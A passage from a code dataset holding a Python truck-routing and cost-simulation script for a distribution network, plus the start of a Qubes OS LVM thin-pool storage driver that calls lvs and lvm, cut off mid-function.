"numpy.linalg.norm", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 217, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 230, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 237, "usage_type": "attribute"}, {"api_name": "cpp_wrappers.cpp_preprocess.propagation.compute_labels", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 241, "usage_type": "call"}, {"api_name": "cpp_wrappers.cpp_preprocess.propagation.cluster", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 256, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 256, "usage_type": "call"}, {"api_name": "os.path", "line_number": 256, "usage_type": "name"}]} +{"seq_id": "22046569853", "text": "\"\"\"Main file to be run\"\"\"\n\n## Imports\nfrom Code import dataInput, routing, linearProgram\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nfrom matplotlib import pyplot as plt\n\nfrom typing import List, Dict, Tuple\n\n#--------------------------------------------------------------------------------------------\n# Global Variables\n#--------------------------------------------------------------------------------------------\nsettings = dataInput.readRoutes(\"settings.json\") # global settings file\n\ntravelDurations = dataInput.readTravelDurations()\ncoordinates = dataInput.readStoreCoordinates()\n\ndepot = \"Distribution Centre Auckland\"\nrouteFinder = routing.Pathfinder(travelDurations)\n\n#--------------------------------------------------------------------------------------------\n# Local Helper Functions\n#--------------------------------------------------------------------------------------------\n\ncost = lambda duration: 225*duration + 50*max(0, duration-4)\n\nclass LP_NOT_OPTIMAL(Exception):\n def __init__(self, message: str):\n self.message = message\n super().__init__(self.message)\n\ndef calculateDuration(route: List[str], demands: Dict[str, float], multiplier: float = 1.0):\n \"\"\"Calculates the duration for a route given the demands (durations are assumed to be global)\"\"\"\n ans = 0\n for i in range(len(route)-1):\n ans += travelDurations[route[i]][route[i+1]]*multiplier\n ans += 0.125*demands[route[i+1]]\n\n return round(ans + travelDurations[route[-1]][depot]*multiplier, 3)\n\n#--------------------------------------------------------------------------------------------\n# Initial Solution Generation\n#--------------------------------------------------------------------------------------------\n\ndef getRoutes(regionalDemands: Dict[str, float], removeOutliers: float = 1, maxStops: int = 6):\n \"\"\"Function to generate valid 
routes given the demands for a region on a specified day.\"\"\"\n    \n    regionRoutingObj = routing.Region(nodes=regionalDemands, locations=coordinates)\n\n    validSubgraphs = regionRoutingObj.findValidSubgraphs(removeOutliers=removeOutliers, maxStops=maxStops)\n    \n    routes = []\n    for k in validSubgraphs:\n        for route in validSubgraphs[k]:\n            solution = routeFinder.nearestNeighbour([depot] + route)\n            routes.append(solution[solution.index(depot):] + solution[:solution.index(depot)])\n\n    return routes\n\ndef eliminatePoorRoutes(routes, demands, minLenToKeep: int = 2, maxDuration: float = 6.0):\n    \"\"\"Removes routes whose duration exceeds maxDuration, unless the route has at most minLenToKeep stops.\"\"\"\n    durations = [calculateDuration(route, demands) for route in routes] # ignore traffic multiplier\n\n    newRoutes = [routes[i] for i in range(len(durations)) if durations[i] < maxDuration or len(routes[i]) <= minLenToKeep]\n    return newRoutes\n\ndef findInitalSolution(day: str, demands: Dict[str, float], locations: Dict[str,List[str]], \n                       centroid_mean_ratio: float, max_stores: int, traffic_multiplier: float,\n                       min_route_length: int, max_duration: float, lpDisplay: bool):\n    \"\"\"Finds the solutions for a given day by solving a set-partitioning LP over the candidate routes of each region.\"\"\"\n    \n    # demands = dataInput.readAverageDemands(roundUp=True)\n    # locations = dataInput.readLocationGroups()\n\n    \n    solution = {}\n    solutionStatus = True\n\n    for region in locations.keys():\n        regionalDemands = {location: demands[day][location] for location in locations[region] if demands[day][location] > 0}\n\n        routes = getRoutes(regionalDemands, removeOutliers=centroid_mean_ratio, maxStops=max_stores)\n        routes = eliminatePoorRoutes(routes, regionalDemands, minLenToKeep=min_route_length, maxDuration=max_duration)\n        stores = regionalDemands.keys()\n        durations = [calculateDuration(route, regionalDemands, multiplier=traffic_multiplier) for route in routes]\n\n        regionalSolution, problemStatus = linearProgram.findBestPartition(day, region, routes, stores, durations, disp=lpDisplay)\n        \n        solution[region] = regionalSolution\n        solutionStatus = solutionStatus and problemStatus\n    \n    return solution, solutionStatus\n\n\n## Traffic and demand simulations\n#--------------------------------------------------------------------------------------------\n# Traffic and Demand Simulations\n#--------------------------------------------------------------------------------------------\ndef generateDemands(demands: pd.DataFrame, day: str, sampleSize: int=1000):\n    simDemands = {shop: [] for shop in demands.index}\n    \n    for shop in demands.index:\n        if day == \"WeekdayAvg\":\n            simDemands[shop] = stats.norm.rvs(loc=demands[\"Demand\"][shop], scale=demands[\"std\"][shop], size=sampleSize)\n        elif day == \"Saturday\":\n            simDemands[shop] = stats.uniform.rvs(loc=demands[\"min\"][shop],scale=demands[\"max\"][shop] - demands[\"min\"][shop], size=sampleSize)\n        else:\n            raise ValueError(\"Invalid day supplied\") \n    \n    return simDemands\n\ndef checkRoute(demands, routes):\n    \"\"\"\n    Checks the demand on each route and splits a route into subroutes wherever\n    the cumulative demand exceeds the truck capacity of 26.\n    \"\"\"\n    newRoutes = []\n    # going through each route and checking the demand\n    for route in routes: \n        # cDemand stores the demand of the current \"subroute\", j the start of the subroute\n        cDemand, j = 0, 1 \n        tempRoutes = []\n        for i in range(1,len(route)):\n            cDemand += demands[route[i]]\n            if cDemand > 26: # we split the route and start a new subroute\n                tempRoutes.append([depot]+route[j:i])\n                cDemand, j = demands[route[i]], i\n        else: # adding on the remaining portion of the route \n            if route[j:]:\n                tempRoutes.append([depot]+route[j:])\n\n        
newRoutes.extend(tempRoutes)\n    return newRoutes\n\ndef runSimulationInstance(demands: pd.DataFrame, routes: List[List[str]], trafficMultiplier: float, trafficStd: float = 0.1, simulationNumber: int = 1000):\n    # demands = pd.DataFrame.from_dict(generateDemandsWeekday(), orient='index')\n    newRoutes = []\n    routeLengths = []\n    routeDurations = []\n    routeCosts = []\n\n    # print(\"Running weekday 8-12\")\n    for i in range(simulationNumber):\n        multiplier = stats.norm.rvs(loc=trafficMultiplier, scale=trafficStd)\n        curCost = 0\n        curDur = 0\n\n        # splitting the routes to account for new demands \n        tempRoutes = checkRoute(demands.loc[:,i], routes=routes)\n\n        routeLengths.append(len(tempRoutes))\n        newRoutes.append(tempRoutes)\n        \n        for route in tempRoutes:\n            tempDuration = calculateDuration(route, demands.loc[:,i], multiplier=multiplier)\n            curDur += tempDuration\n            curCost += cost(tempDuration)\n\n        # assert(checkSolutionIsPartition(tempRoutes))\n        routeCosts.append(curCost)\n        routeDurations.append(curDur/routeLengths[-1])\n\n    tempRoutes = [x for _, x in sorted(zip(routeCosts, newRoutes))]\n    \n    resRoutes = {\n        \"lower\": tempRoutes[25],\n        \"median\": tempRoutes[500],\n        \"upper\": tempRoutes[975]\n    }\n\n    statistics = {\n        \"lengths\": [x for _,x in sorted(zip(routeCosts,routeLengths))], \n        \"durations\": [x for _,x in sorted(zip(routeCosts,routeDurations))], \n        \"costs\": sorted(routeCosts)\n    }\n\n    return resRoutes, statistics\n\n## Store closure simulations\n#--------------------------------------------------------------------------------------------\n# Store Closure Simulations\n#--------------------------------------------------------------------------------------------\n\n# nothing to see here...\n\n## Main control functions\n#--------------------------------------------------------------------------------------------\n# Main Control Functions\n#--------------------------------------------------------------------------------------------\n\ndef initialOptimisation(days: List[str] = [\"WeekdayAvg\", \"Saturday\"]):\n    localSettings = settings[\"inital_solution\"][\"run_args\"]\n\n\n    demands = dataInput.readAverageDemands(roundUp=localSettings[\"round_up\"])\n    locations = dataInput.readLocationGroups()\n\n    solutions = {}\n    for day in days:\n        solutions[day] = []\n\n        temp, solStatus = findInitalSolution(day, demands, locations, \n                            centroid_mean_ratio=localSettings[\"centroid_mean_ratio\"], \n                            max_stores=localSettings[\"max_stores\"][day], \n                            traffic_multiplier=localSettings[\"traffic_multiplier\"], \n                            min_route_length=localSettings[\"min_route_length\"], \n                            max_duration=localSettings[\"max_duration\"][day],\n                            lpDisplay=localSettings[\"display_lp_output\"])\n        \n        if not solStatus:\n            raise LP_NOT_OPTIMAL(f\"\\033[93mThe solution for {day} was not optimal\\033[0m\")\n\n        for region in temp: # constructing a list of all routes for the day\n            solutions[day].extend(temp[region])\n    \n    return solutions\n\ndef simulateUncertainty(initialSolutions: Dict[str, List[str]], days: List[str] = [\"WeekdayAvg\", \"Saturday\"], periods: List[str] = [\"morning\",\"evening\"]):\n\n    if any([day not in [\"WeekdayAvg\", \"Saturday\"] for day in days]): \n        raise NotImplementedError(\"There is currently no implementation for days other than 'WeekdayAvg' and 'Saturday'.\")\n\n    localSettings = settings[\"uncertainty_simulation\"][\"run_args\"]\n\n    demands = {\n        \"WeekdayAvg\": dataInput.readDataWithStats(roundUp=localSettings[\"round_up\"]), \n        \"Saturday\": dataInput.readSaturdayWithStats(roundUp=localSettings[\"round_up\"])\n    }\n    \n    simulationResults = {}\n    
for day in days:\n dayDemands = generateDemands(demands[day], day)\n dayDemands = pd.DataFrame.from_dict(dayDemands, orient='index')\n\n dayResults = {}\n for i in range(len(periods)):\n newRoutes, statistics = runSimulationInstance(demands=dayDemands, routes=initialSolutions[day], \n trafficMultiplier=localSettings[\"traffic_multipliers\"][day][i], \n trafficStd=localSettings[\"traffic_std\"],\n simulationNumber=localSettings[\"simulation_size\"])\n \n periodResults = {}\n periodResults[\"routes\"] = newRoutes\n periodResults[\"statistics\"] = statistics\n \n dayResults[periods[i]] = periodResults\n\n simulationResults[day] = dayResults\n\n\n\n return simulationResults\n\ndef simulateStoreClosures(days: List[str] = [\"WeekdayAvg\", \"Saturday\"]):\n localSettings = settings[\"store_closures\"][\"run_args\"]\n\n demands = dataInput.readDemandsWithStoreClosure(toClose=localSettings[\"stores_to_close_and_keep\"], \n transferRatio=localSettings[\"transfer_ratio\"],\n roundUp=localSettings[\"round_up\"])\n locations = dataInput.readLocationGroupsWithStoreClosure(toClose=localSettings[\"stores_to_close_and_keep\"]) \n \n solutions = {}\n for day in days:\n solutions[day] = []\n\n temp, solStatus = findInitalSolution(day, demands, locations, \n centroid_mean_ratio=localSettings[\"centroid_mean_ratio\"], \n max_stores=localSettings[\"max_stores\"][day], \n traffic_multiplier=localSettings[\"traffic_multiplier\"], \n min_route_length=localSettings[\"min_route_length\"], \n max_duration=localSettings[\"max_duration\"][day],\n lpDisplay=localSettings[\"display_lp_output\"])\n \n if not solStatus:\n raise LP_NOT_OPTIMAL(f\"\\033[93mThe solution for {day} was not optimal\\033[0m\")\n\n for region in temp: # constructing a list of all routes for the day\n solutions[day].extend(temp[region])\n \n return solutions\n\n#--------------------------------------------------------------------------------------------\n# Main Function\n#--------------------------------------------------------------------------------------------\n\ndef main():\n np.random.seed(508)\n # yes this could be a for loop...\n\n # initial solutions\n if settings[\"inital_solution\"][\"run\"]:\n msg = \"Running Initial Solution:\"\n print(f\"\\n\\t{msg}\\n\\t{'_'*len(msg)}\\n\")\n \n initialResults = initialOptimisation()\n \n if settings[\"inital_solution\"][\"save\"]:\n dataInput.storeRoutes(initialResults, fileAddress=\"Solutions/initialRoutes.json\") \n else:\n initialResults = dataInput.readRoutes(\"Solutions/initialRoutes.json\")\n\n if settings[\"inital_solution\"][\"plot\"]:\n msg = \"Displaying Initial Results:\"\n print(f\"\\n\\t{msg}\\n\\t{'_'*len(msg)}\\n\")\n\n demands = dataInput.readAverageDemands(roundUp=settings[\"inital_solution\"][\"run_args\"][\"round_up\"])\n\n for day in initialResults.keys():\n print(f\"\\n\\t\\t{day}:\\n\\t\\t{'-'*(len(day)+1)}\\n\")\n\n durations = [calculateDuration(route, demands[day], settings[\"inital_solution\"][\"run_args\"][\"traffic_multiplier\"]) for route in initialResults[day]]\n costs = [cost(dur) for dur in durations]\n\n print(f\"Total Cost:\\t\\t{sum(costs):.3f}\")\n print(f\"Average Duration:\\t{sum(durations)/len(durations):.3f}\")\n print(f\"Number of Trucks:\\t{len(durations)}\\n\")\n\n # uncertainty simulations\n if settings[\"uncertainty_simulation\"][\"run\"]:\n simulationResults = simulateUncertainty(initialSolutions=initialResults)\n\n if settings[\"uncertainty_simulation\"][\"save\"]:\n dataInput.storeRoutes(simulationResults, 
fileAddress=\"Solutions/simulationResults.json\") \n else:\n simulationResults = dataInput.readRoutes(\"Solutions/simulationResults.json\")\n\n if settings[\"uncertainty_simulation\"][\"plot\"]:\n msg = \"Displaying Simulation Results:\"\n print(f\"\\n\\t{msg}\\n\\t{'_'*len(msg)}\\n\")\n\n demands = dataInput.readAverageDemands(roundUp=settings[\"uncertainty_simulation\"][\"run_args\"][\"round_up\"])\n\n for day in simulationResults.keys():\n print(f\"\\n\\t\\t{day}:\\n\\t\\t{'-'*(len(day)+1)}\\n\")\n\n multipliers = settings[\"uncertainty_simulation\"][\"run_args\"][\"traffic_multipliers\"][day]\n # maybe not the right term?\n for period in simulationResults[day]:\n print(f\"\\n{period}:\\n{'-'*(len(period)+1)}\\n\")\n period_multiplier = multipliers[0] if period == \"morning\" else multipliers[1]\n \n tempData = simulationResults[day][period][\"statistics\"]\n\n \n\n keys = {# quick fix\n \"lower\":25,\n \"median\":500,\n \"upper\":975\n }\n for measure in simulationResults[day][period][\"routes\"]:\n print(f\"\\n{measure}:\\n\")\n \n\n print(f\"Total Cost:\\t\\t{tempData['costs'][keys[measure]]:.3f}\")\n print(f\"Average Duration:\\t{tempData['durations'][keys[measure]]:.3f}\")\n print(f\"Number of Trucks:\\t{tempData['lengths'][keys[measure]]}\\n\")\n\n \n msg = \"Statistics:\"\n print(f\"{msg}\")\n\n print(f\"Average Cost:\\t\\t\\t{np.mean(tempData['costs']):.3f}\")\n print(f\"Average Duration:\\t\\t{np.mean(tempData['durations']):.3f}\")\n print(f\"Average Number of Trucks:\\t{np.mean(tempData['lengths'])}\\n\")\n\n\n # resolving with store closures\n if settings[\"store_closures\"][\"run\"]:\n storeClosureResults = simulateStoreClosures()\n\n if settings[\"store_closures\"][\"save\"]:\n dataInput.storeRoutes(storeClosureResults, fileAddress=\"Solutions/storeClosureSolutions.json\") \n else:\n storeClosureResults = dataInput.readRoutes(\"Solutions/storeClosureSolutions.json\")\n\n if settings[\"store_closures\"][\"plot\"]:\n msg = \"Displaying Store Closure Results:\"\n print(f\"\\n\\t{msg}\\n\\t{'_'*len(msg)}\\n\")\n\n demands = dataInput.readDemandsWithStoreClosure(toClose=settings[\"store_closures\"][\"run_args\"][\"stores_to_close_and_keep\"],\n transferRatio=settings[\"store_closures\"][\"run_args\"][\"transfer_ratio\"],\n roundUp=settings[\"store_closures\"][\"run_args\"][\"round_up\"])\n\n for day in storeClosureResults.keys():\n print(f\"\\n\\t\\t{day}:\\n\\t\\t{'-'*(len(day)+1)}\\n\")\n\n durations = [calculateDuration(route, demands[day], settings[\"store_closures\"][\"run_args\"][\"traffic_multiplier\"]) for route in storeClosureResults[day]]\n costs = [cost(dur) for dur in durations]\n\n print(f\"Total Cost:\\t\\t{sum(costs):.3f}\")\n print(f\"Average Duration:\\t{sum(durations)/len(durations):.3f}\")\n print(f\"Number of Trucks:\\t{len(durations)}\\n\")\n return\n\n\n\nif __name__ == \"__main__\":\n # demands = dataInput.readAverageDemands()\n # for route in routes:\n # duration = calculateDuration(route, demands)\n # tempcost = cost(duration)\n\n\n main()\n # data = dataInput.readRoutes(\"simulationResults.json\")\n # routes = data[\"WeekdayAvg\"][\"morning\"][\"routes\"][\"lower\"]\n # print(routes)\n # demands = dataInput.readAverageDemands()\n # for route in routes:\n # duration = calculateDuration(route,demands[\"WeekdayAvg\"])\n # tempcost = cost(duration)\n # print(tempcost)\n\n", "repo_name": "NicholasLee-ENGSCI/https-github.com-NicholasLee-ENGSCI-tab-repositories", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 18026, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "Code.dataInput.readRoutes", "line_number": 16, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 16, "usage_type": "name"}, {"api_name": "Code.dataInput.readTravelDurations", "line_number": 18, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 18, "usage_type": "name"}, {"api_name": "Code.dataInput.readStoreCoordinates", "line_number": 19, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 19, "usage_type": "name"}, {"api_name": "Code.routing.Pathfinder", "line_number": 22, "usage_type": "call"}, {"api_name": "Code.routing", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 48, "usage_type": "name"}, {"api_name": "Code.routing.Region", "line_number": 51, "usage_type": "call"}, {"api_name": "Code.routing", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 70, "usage_type": "name"}, {"api_name": "Code.linearProgram.findBestPartition", "line_number": 90, "usage_type": "call"}, {"api_name": "Code.linearProgram", "line_number": 90, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 102, "usage_type": "attribute"}, {"api_name": "scipy.stats.norm.rvs", "line_number": 107, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 107, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 107, "usage_type": "name"}, {"api_name": "scipy.stats.uniform.rvs", "line_number": 109, "usage_type": "call"}, {"api_name": "scipy.stats.uniform", "line_number": 109, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 109, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 139, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 139, "usage_type": "name"}, {"api_name": "scipy.stats.norm.rvs", "line_number": 148, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 148, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 195, "usage_type": "name"}, {"api_name": "Code.dataInput.readAverageDemands", "line_number": 199, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 199, "usage_type": "name"}, {"api_name": "Code.dataInput.readLocationGroups", "line_number": 200, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 200, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 222, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 222, "usage_type": "name"}, {"api_name": "Code.dataInput.readDataWithStats", "line_number": 230, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 230, "usage_type": "name"}, {"api_name": "Code.dataInput.readSaturdayWithStats", "line_number": 231, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 231, "usage_type": "name"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 237, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 237, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 258, "usage_type": "name"}, {"api_name": "Code.dataInput.readDemandsWithStoreClosure", 
"line_number": 261, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 261, "usage_type": "name"}, {"api_name": "Code.dataInput.readLocationGroupsWithStoreClosure", "line_number": 264, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 264, "usage_type": "name"}, {"api_name": "numpy.random.seed", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 291, "usage_type": "attribute"}, {"api_name": "Code.dataInput.storeRoutes", "line_number": 302, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 302, "usage_type": "name"}, {"api_name": "Code.dataInput.readRoutes", "line_number": 304, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 304, "usage_type": "name"}, {"api_name": "Code.dataInput.readAverageDemands", "line_number": 310, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 310, "usage_type": "name"}, {"api_name": "Code.dataInput.storeRoutes", "line_number": 327, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 327, "usage_type": "name"}, {"api_name": "Code.dataInput.readRoutes", "line_number": 329, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 329, "usage_type": "name"}, {"api_name": "Code.dataInput.readAverageDemands", "line_number": 335, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 335, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 369, "usage_type": "call"}, {"api_name": "Code.dataInput.storeRoutes", "line_number": 377, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 377, "usage_type": "name"}, {"api_name": "Code.dataInput.readRoutes", "line_number": 379, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 379, "usage_type": "name"}, {"api_name": "Code.dataInput.readDemandsWithStoreClosure", "line_number": 385, "usage_type": "call"}, {"api_name": "Code.dataInput", "line_number": 385, "usage_type": "name"}]} +{"seq_id": "22009028157", "text": "import logging\nimport operator\nimport os\nimport subprocess\n\nimport time\n\nimport asyncio\n\nimport qubes\nimport qubes.storage\nimport qubes.utils\n\n\ndef check_lvm_version():\n #Check if lvm is very very old, like in Travis-CI\n try:\n lvm_help = subprocess.check_output(['lvm', 'lvcreate', '--help'],\n stderr=subprocess.DEVNULL).decode()\n return '--setactivationskip' not in lvm_help\n except (subprocess.CalledProcessError, FileNotFoundError):\n pass\n\nlvm_is_very_old = check_lvm_version()\n\nclass ThinPool(qubes.storage.Pool):\n ''' LVM Thin based pool implementation\n ''' # pylint: disable=protected-access\n\n size_cache = None\n\n driver = 'lvm_thin'\n\n def __init__(self, volume_group, thin_pool, revisions_to_keep=1, **kwargs):\n super(ThinPool, self).__init__(revisions_to_keep=revisions_to_keep,\n **kwargs)\n self.volume_group = volume_group\n self.thin_pool = thin_pool\n self._pool_id = \"{!s}/{!s}\".format(volume_group, thin_pool)\n self.log = logging.getLogger('qubes.storage.lvm.%s' % self._pool_id)\n\n self._volume_objects_cache = {}\n\n @property\n def config(self):\n return {\n 'name': self.name,\n 'volume_group': self.volume_group,\n 'thin_pool': self.thin_pool,\n 'driver': ThinPool.driver\n }\n\n def destroy(self):\n pass # TODO Should we remove an existing pool?\n\n def init_volume(self, vm, volume_config):\n ''' Initialize a 
:py:class:`qubes.storage.Volume` from `volume_config`.\n '''\n\n if 'revisions_to_keep' not in volume_config.keys():\n volume_config['revisions_to_keep'] = self.revisions_to_keep\n if 'vid' not in volume_config.keys():\n if vm and hasattr(vm, 'name'):\n vm_name = vm.name\n else:\n # for the future if we have volumes not belonging to a vm\n vm_name = qubes.utils.random_string()\n\n assert self.name\n\n volume_config['vid'] = \"{!s}/vm-{!s}-{!s}\".format(\n self.volume_group, vm_name, volume_config['name'])\n\n volume_config['volume_group'] = self.volume_group\n volume_config['pool'] = self\n volume = ThinVolume(**volume_config)\n self._volume_objects_cache[volume_config['vid']] = volume\n return volume\n\n def setup(self):\n reset_cache()\n cache_key = self.volume_group + '/' + self.thin_pool\n if cache_key not in size_cache:\n raise qubes.storage.StoragePoolException(\n 'Thin pool {} does not exist'.format(cache_key))\n if size_cache[cache_key]['attr'][0] != 't':\n raise qubes.storage.StoragePoolException(\n 'Volume {} is not a thin pool'.format(cache_key))\n # TODO Should we create a non existing pool?\n\n def get_volume(self, vid):\n ''' Return a volume with given vid'''\n if vid in self._volume_objects_cache:\n return self._volume_objects_cache[vid]\n\n config = {\n 'pool': self,\n 'vid': vid,\n 'name': vid,\n 'volume_group': self.volume_group,\n }\n # don't cache this object, as it doesn't carry full configuration\n return ThinVolume(**config)\n\n def list_volumes(self):\n ''' Return a list of volumes managed by this pool '''\n volumes = []\n for vid, vol_info in size_cache.items():\n if not vid.startswith(self.volume_group + '/'):\n continue\n if vol_info['pool_lv'] != self.thin_pool:\n continue\n if vid.endswith('-snap'):\n # implementation detail volume\n continue\n if vid.endswith('-back'):\n # old revisions\n continue\n config = {\n 'pool': self,\n 'vid': vid,\n 'name': vid,\n 'volume_group': self.volume_group,\n 'rw': vol_info['attr'][1] == 'w',\n }\n volumes += [ThinVolume(**config)]\n return volumes\n\n @property\n def size(self):\n try:\n return qubes.storage.lvm.size_cache[\n self.volume_group + '/' + self.thin_pool]['size']\n except KeyError:\n return 0\n\n @property\n def usage(self):\n try:\n return qubes.storage.lvm.size_cache[\n self.volume_group + '/' + self.thin_pool]['usage']\n except KeyError:\n return 0\n\n\ndef init_cache(log=logging.getLogger('qubes.storage.lvm')):\n cmd = ['lvs', '--noheadings', '-o',\n 'vg_name,pool_lv,name,lv_size,data_percent,lv_attr,origin',\n '--units', 'b', '--separator', ';']\n if os.getuid() != 0:\n cmd.insert(0, 'sudo')\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n close_fds=True)\n out, err = p.communicate()\n return_code = p.returncode\n if return_code == 0 and err:\n log.warning(err)\n elif return_code != 0:\n raise qubes.storage.StoragePoolException(err)\n\n result = {}\n\n for line in out.splitlines():\n line = line.decode().strip()\n pool_name, pool_lv, name, size, usage_percent, attr, \\\n origin = line.split(';', 6)\n if '' in [pool_name, name, size, usage_percent]:\n continue\n name = pool_name + \"/\" + name\n size = int(size[:-1]) # Remove 'B' suffix\n usage = int(size / 100 * float(usage_percent))\n result[name] = {'size': size, 'usage': usage, 'pool_lv': pool_lv,\n 'attr': attr, 'origin': origin}\n\n return result\n\n\nsize_cache = init_cache()\n\nclass ThinVolume(qubes.storage.Volume):\n ''' Default LVM thin volume implementation\n ''' # pylint: disable=too-few-public-methods\n\n\n def 
__init__(self, volume_group, size=0, **kwargs):\n self.volume_group = volume_group\n super(ThinVolume, self).__init__(size=size, **kwargs)\n self.log = logging.getLogger('qubes.storage.lvm.%s' % str(self.pool))\n\n if self.snap_on_start or self.save_on_stop:\n self._vid_snap = self.vid + '-snap'\n\n self._size = size\n\n @property\n def path(self):\n return '/dev/' + self.vid\n\n @property\n def revisions(self):\n name_prefix = self.vid + '-'\n revisions = {}\n for revision_vid in size_cache:\n if not revision_vid.startswith(name_prefix):\n continue\n if not revision_vid.endswith('-back'):\n continue\n revision_vid = revision_vid[len(name_prefix):]\n seconds = int(revision_vid[:-len('-back')])\n iso_date = qubes.storage.isodate(seconds).split('.', 1)[0]\n revisions[revision_vid] = iso_date\n return revisions\n\n @property\n def size(self):\n try:\n if self.is_dirty():\n return qubes.storage.lvm.size_cache[self._vid_snap]['size']\n return qubes.storage.lvm.size_cache[self.vid]['size']\n except KeyError:\n return self._size\n\n @size.setter\n def size(self, _):\n raise qubes.storage.StoragePoolException(\n \"You shouldn't use lvm size setter\")\n\n def _reset(self):\n ''' Resets a volatile volume '''\n assert not self.snap_on_start and not self.save_on_stop, \\\n \"Not a volatile volume\"\n self.log.debug('Resetting volatile %s', self.vid)\n try:\n cmd = ['remove', self.vid]\n qubes_lvm(cmd, self.log)\n except qubes.storage.StoragePoolException:\n pass\n # pylint: disable=protected-access\n cmd = ['create', self.pool._pool_id, self.vid.split('/')[1],\n str(self.size)]\n qubes_lvm(cmd, self.log)\n\n def _remove_revisions(self, revisions=None):\n '''Remove old volume revisions.\n\n If no revisions list is given, it removes old revisions according to\n :py:attr:`revisions_to_keep`\n\n :param revisions: list of revisions to remove\n '''\n if revisions is None:\n revisions = sorted(self.revisions.items(),\n key=operator.itemgetter(1))\n # pylint: disable=invalid-unary-operand-type\n revisions = revisions[:(-self.revisions_to_keep) or None]\n revisions = [rev_id for rev_id, _ in revisions]\n\n for rev_id in revisions:\n try:\n cmd = ['remove', self.vid + '-' + rev_id]\n qubes_lvm(cmd, self.log)\n except qubes.storage.StoragePoolException:\n pass\n\n def _commit(self):\n msg = \"Trying to commit {!s}, but it has save_on_stop == False\"\n msg = msg.format(self)\n assert self.save_on_stop, msg\n\n msg = \"Trying to commit {!s}, but it has rw == False\"\n msg = msg.format(self)\n assert self.rw, msg\n assert hasattr(self, '_vid_snap')\n\n if self.revisions_to_keep > 0:\n cmd = ['clone', self.vid,\n '{}-{}-back'.format(self.vid, int(time.time()))]\n qubes_lvm(cmd, self.log)\n reset_cache()\n self._remove_revisions()\n\n # TODO: when converting this function to coroutine, this _must_ be\n # under a lock\n # remove old volume only after _successful_ clone of the new one\n cmd = ['rename', self.vid, self.vid + '-tmp']\n qubes_lvm(cmd, self.log)\n try:\n cmd = ['clone', self._vid_snap, self.vid]\n qubes_lvm(cmd, self.log)\n except:\n # restore original volume\n cmd = ['rename', self.vid + '-tmp', self.vid]\n qubes_lvm(cmd, self.log)\n raise\n else:\n cmd = ['remove', self.vid + '-tmp']\n qubes_lvm(cmd, self.log)\n\n\n def create(self):\n assert self.vid\n assert self.size\n if self.save_on_stop:\n if self.source:\n cmd = ['clone', str(self.source), self.vid]\n else:\n cmd = [\n 'create',\n self.pool._pool_id, # pylint: disable=protected-access\n self.vid.split('/', 1)[1],\n str(self.size)\n ]\n 
